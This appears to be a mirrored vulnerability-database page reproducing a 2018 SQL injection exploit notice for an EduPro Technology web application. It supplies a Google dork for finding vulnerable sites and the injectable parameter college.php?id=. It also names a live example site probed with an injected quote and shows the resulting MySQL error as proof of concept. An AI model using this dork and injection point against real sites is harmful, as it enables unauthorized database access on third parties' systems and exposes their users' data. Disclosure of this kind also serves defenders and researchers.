Gettarget EduProTech © 2003-2016 EduPro Technology Pvt. Ltd. SQL Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1214908 漏洞类型
发布时间 2018-07-07 更新时间 2018-07-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070066
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Gettarget EduProTech © 2003-2016 EduPro Technology Pvt. Ltd. SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/07/2018
# Vendor Homepages : gettarget.com ~ eduprotech.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Description : EduPro Technology Pvt. Ltd. is a global products and app development company that has served more than onehundred businesses and industrial entities to help them reach their organizational goals most profitably. 
EduPro Technology providing solutions to every need of clients and also transforming business proposals into commercial practicalities. 

# Google Dork  : intext:''© 2003-2016 EduPro Technology Pvt. Ltd.''

# Exploit : /DOMAINADDRESSNAME/medical/college.php?id=[SQL Inj]

#################################################################################################

# Example Site => settarget.co/settarget/medical/college.php?id=472%27 => [ Proof of Concept ] => archive.is/v5gV4

# SQL Database Error => 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 22

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################